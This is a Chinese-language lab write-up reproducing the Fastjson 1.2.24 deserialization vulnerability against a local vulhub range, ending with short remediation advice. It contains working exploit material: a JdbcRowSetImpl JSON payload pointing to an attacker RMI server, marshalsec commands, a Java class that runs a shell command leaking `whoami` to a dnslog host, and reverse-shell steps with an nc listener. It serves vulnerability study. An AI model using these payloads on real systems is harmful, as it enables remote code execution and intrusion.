1. 预备知识

Fastjson是一款高性能的Java JSON处理库，由阿里巴巴集团开发和维护。作为一个中间件，Fastjson提供了快速、灵活和可靠的JSON序列化和反序列化功能，使开发者能够在Java应用程序中轻松处理JSON数据。
Fastjson具有以下主要特性：

1. 高性能：Fastjson是一个高性能的JSON处理库，具有快速的序列化和反序列化能力。它采用了一系列优化技术，如缓存机制、算法优化和数据结构设计，以实现最佳的性能。Fastjson在序列化和反序列化大型JSON数据时表现出色，是处理高吞吐量数据的理想选择。
2. 灵活性：Fastjson提供了丰富的配置选项和灵活的使用方式。开发者可以通过注解、API调用或者配置文件来定义JSON与Java对象之间的映射关系。Fastjson支持复杂的数据结构，如嵌套对象、集合和数组等，以满足不同类型的数据处理需求。
3. 数据转换：Fastjson支持将Java对象转换为JSON字符串，也支持将JSON字符串转换为Java对象。开发者可以轻松地进行对象到JSON的转换和JSON到对象的转换，无需繁琐的手动操作。Fastjson还提供了便捷的数据格式化功能，如日期格式化、数字精度控制和空值处理等。
4. 安全性：Fastjson在数据处理过程中注重安全性。它提供了防止JSON注入攻击的机制，避免恶意JSON数据对系统造成损害。Fastjson支持过滤器功能，可以控制和限制特定类型的数据访问，提供更加安全的数据处理环境。
5. 社区支持：Fastjson拥有庞大的用户和开发者社区，提供了广泛的文档资源、示例代码和技术支持。开发者可以通过社区获取帮助、解决问题，并分享自己的经验和贡献。Fastjson持续更新和改进，致力于提供更好的性能和功能。
   Fastjson作为一款成熟的JSON处理库，被广泛应用于Java开发领域。它在各种场景下都能提供高效、可靠的JSON数据处理能力，包括Web应用程序、分布式系统、移动应用和大数据处理等。通过使用Fastjson，开发者可以轻松地处理和操作JSON数据，实现高效的数据交换和处理。

2. 漏洞复现

2.1 漏洞介绍

FastJson 库是 Java 的一个 Json 库，其作用是将 Java 对象转换成 json 数据来表示，也可以将 json 数据转换成 Java 对象，使用非常方便，号称是执行速度最快的库。
在 1.2.24 版本的 Fastjson 出现了一个反序列化的漏洞，fastjson 在解析 json 的过程中，支持使用 autoType 来实例化某一个具体的类，并调用该类的 set/get 方法来访问属性。通过查找代码中相关的方法，即可构造出一些恶意利用链。

2.2 漏洞原理分析

2.2.1 Fastjson序列化/反序列化原理

Fastjson的漏洞本质还是一个java的反序列化漏洞，由于引进了AutoType功能，fastjson在对json字符串反序列化的时候，会读取到@type的内容，将json内容反序列化为java对象并调用这个类的setter方法。
那么为什么要引进AutoType功能呢？
fastjson在序列化以及反序列化的过程中并没有使用Java自带的序列化机制，而是自定义了一套机制。其实，对于JSON框架来说，想要把一个Java对象转换成字符串，可以有两种选择：
1.基于setter/getter
2.基于属性（AutoType）
基于setter/getter会带来什么问题呢，下面举个例子，假设有如下两个类：

class Apple implements Fruit {
    private Big_Decimal price;
    //省略 setter/getter、toString等
}
 
class iphone implements Fruit {
    private Big_Decimal price;
    //省略 setter/getter、toString等
}

实例化对象之后，假设苹果对象的price为0.5，Apple类对象序列化为json格式后为：

{"Fruit":{"price":0.5}}

假设iphone对象的price为5000，序列化为json格式后为：

{"Fruit":{"price":5000}}

当一个类只有一个接口的时候，将这个类的对象序列化的时候，就会将子类抹去（apple/iphone）只保留接口的类型(Fruit)，最后导致反序列化时无法得到原始类型。本例中，将两个json再反序列化生成java对象的时候，无法区分原始类是apple还是iphone。
为了解决上述问题： fastjson引入了基于属性（AutoType），即在序列化的时候，先把原始类型记录下来。使用@type的键记录原始类型，在本例中，引入AutoType后，Apple类对象序列化为json格式后为：

{ "fruit":{ "@type":"com.hollis.lab.fastjson.test.Apple", "price":0.5 } }

引入AutoType后，iphone类对象序列化为json格式后为：

{ "fruit":{ "@type":"com.hollis.lab.fastjson.test.iphone", "price":5000 } }

这样在反序列化的时候就可以区分原始的类了。

2.2.2 Fastjson反序列化漏洞原理

使用AutoType功能进行序列号的JSON字符会带有一个@type来标记其字符的原始类型，在反序列化的时候会读取这个@type，来试图把JSON内容反序列化到对象，并且会调用这个库的setter或者getter方法，然而，@type的类有可能被恶意构造，只需要合理构造一个JSON，使用@type指定一个想要的攻击类库就可以实现攻击。
常见的有sun官方提供的一个类com.sun.rowset.JdbcRowSetImpl，其中有个dataSourceName方法支持传入一个rmi的源，只要解析其中的url就会支持远程调用！因此整个漏洞复现的原理过程就是：
1、攻击者访问存在fastjson漏洞的目标靶机网站，通过burpsuite抓包改包，以json格式添加com.sun.rowset.JdbcRowSetImpl恶意类信息发送给目标机。
2、存在漏洞的靶机对json反序列化时候，会加载执行我们构造的恶意信息(访问rmi服务器)，靶机服务器就会向rmi服务器请求待执行的命令。
3、rmi 服务器请求加载远程机器的class（这个远程机器是我们搭建好的恶意站点，提前将漏洞利用的代码编译得到.class文件，并上传至恶意站点），得到攻击者（我们）构造好的命令（ping dnslog或者创建文件或者反弹shell之类的）
4、rmi将远程加载得到的class（恶意代码），作为响应返回给靶机服务器。
5、靶机服务器执行了恶意代码，被攻击者成功利用。
按照理解画了如下的图，大致解释一下整个流程：

2.3 实验环境

本实验用kali虚拟机使用docker搭建vulhub靶场，复现fastjson1.2.24

• fastjson<=1.2.24
• VPS（kali-linux-2023.1）
• 工具：marshalsec，burpsuit，dnslog平台

2.3.1 靶场搭建

进入对应的目录后，使用docker-compose up –d命令启动靶场：

然后用docker ps查看对应的容器端口号，如下图，端口为8090

用ifconfig查看虚拟机ip，可看到kali的ip为192.168.10.132，浏览器访问虚拟机ip:8090，页面显示如下：

即可看到JSON格式的输出，靶场搭建成功。

2.3.2 攻击机配置

操作系统：kali-linux-2023.1
配置Java环境：
在复现的过程中出现了许多的问题，在最后发送bp改过的数据包之后，一直无法获取shell，也无法创建文件，后来发现是java和javac的版本问题，要保证是1.8的版本，高版本不适用。
官网下载java8jdk，解压后配置环境变量

重新载入profile生效：source /etc/profile
通过 java -version以及javac -version即可看到是否安装完成：

2.3.3 Java反序列化工具marshalsec：

安装marshalsec需要先安装：maven
下载：wget https://mirrors.bfsu.edu.cn/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz
解压：

mkdir /opt/maven tar zxvf apache-maven-3.6.3-bin.tar.gz -C /opt/maven/

配置环境变量：vim /etc/profile

验证maven是否安装成功：mvn -version

下载：git clone https://github.com/mbechler/marshalsec.git cd marshalsec/ 编译项目：mvn clean package –DskipTests

编译成功后进入target目录：cd target/ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://(启动python服务的ip):(启动python服务的端口)/#dnslog” 9999

2.4 漏洞复现

2.4.1 漏洞探测

访问8090靶场环境，抓包，修改POST请求方式，发送一个post请求，发送的数据为没闭合的花括号，如果服务器没有屏蔽错误信息则会报出fastjson的信息

通过返回包报错信息看出是fastjson框架
接下来使用在线dnslog平台https://dig.pm/配置dnslog：

以同样的方式抓包，修改为POST请求方式，并将Content-Type修改为application/json格式，然后发送的数据内容为• {“zeo”:{“@type”:“java.net.Inet4Address”,“val”:“dnslog”}}，dnslog修改为刚才得到的子域名，可以看到响应状态码为200

刷新dnslog，发现有访问，说明存在fastjson反序列化漏洞

5.4.2 漏洞利用
利用dnslog探测是否出网：
在攻击机上创建dnslog.java，主要执行的语句为：String[] commands = { “/bin/sh”, “-c”, “ping user.whoami.874dad2f.ipv6.1433.eu.org“};，即向dnslog平台发起ping，

import java.lang.Runtime;
import java.lang.Process;
public class dnslog{
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[]commands={“/bin/sh”,“-c”,“ping user.`whoami`.874dad2f.ipv6.1433.eu.org“};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

javac dnslog.java编译生成dnslog.class文件，传到外网系统中（这里传到kali服务器中）
在class文件所在的目录，Python起一个http服务。用4444端口启动http服务的命令为：python -m http.server 4444

然后查看此网址，会看到网站服务器的目录：http://虚拟机ip:4444/

接下来使用marshalsec项目，启动RMI服务，监听9999端口并加载远程类

dnslog.class：
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.10.132:4444/#dnslog" 9999

刷新靶场(http://192.168.10.132:8090)的链接，抓包后改GET包为POST包（右键->变更请求方法），然后在发送的请求数据包中改为以下payload：

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.10.132:9999/dnslog",
        "autoCommit":true
    }
}

可以看到靶场向rmi服务器发起请求，从http服务器下载dnslog.class并执行，刷新dnslog平台，可以看到有新的访问记录，靶场出网成功

远程创建文件：
尝试在靶场目录tmp创建successFrank文件
javac TouchFile.java编译生成TouchFile.class文件，重启http服务器

抓包，原理和上述相同，只需要修改payload如下：

响应状态码为500，可以看到靶场向rmi服务器发起请求，从http服务器下载TouchFile.class并执行
检测tmp目录是否成功创建了successFrank文件

反弹shell的获取：
基本思路和前面是一样的，改一下恶意站点的java代码

重启http服务器和rmi服务器

另起一个终端，开启之前恶意java代码中写的的7777端口，进行监听：nc -lvnp 7777

修改payload：

正在监听7777端口的终端，反弹shell获取成功，已经可以执行任何命令了

漏洞复现成功！

2.5 漏洞修复

1. fastjson 版本至少升级到 1.2.58
2. 及时升级Java环境版本
3. WAF拦截规则，设置白名单